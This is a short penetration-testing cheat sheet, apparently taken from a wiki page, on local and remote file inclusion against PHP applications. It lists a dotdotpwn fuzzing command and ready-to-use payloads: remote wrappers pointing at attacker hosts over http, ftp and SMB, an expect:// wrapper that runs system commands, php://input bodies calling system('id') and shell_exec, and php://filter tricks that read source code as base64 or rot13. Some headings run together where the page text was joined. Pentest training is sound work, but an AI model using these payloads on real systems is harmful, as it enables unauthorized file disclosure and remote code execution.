php wrappers, LFI
dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASSWorkarounds
LFI wordlist
.php wrappers
# protocol wraper
file=http://IP/
file=ftp://IP/
file=//IP/smb-share/file
# expect wrapper
# allows to run system commands
file=expect://id
# input wrapper
file=php://input
# needs to send POST data
<?php system('id'); ?> | <?php shell_exec('id'); ?>
# filter wrappers
file=php://filter/resource=PHP-FILE
file=filter/read=string.rot13/resource=PHP-FILE
file=php://filter/convert.base64-encode/resource=PHP-FILELFI to RCE (linux)
LFI Paths (linux)
LFI Paths (windows)
LFI PHP Code Analysis
RFI PHP Code Analysis
Last updated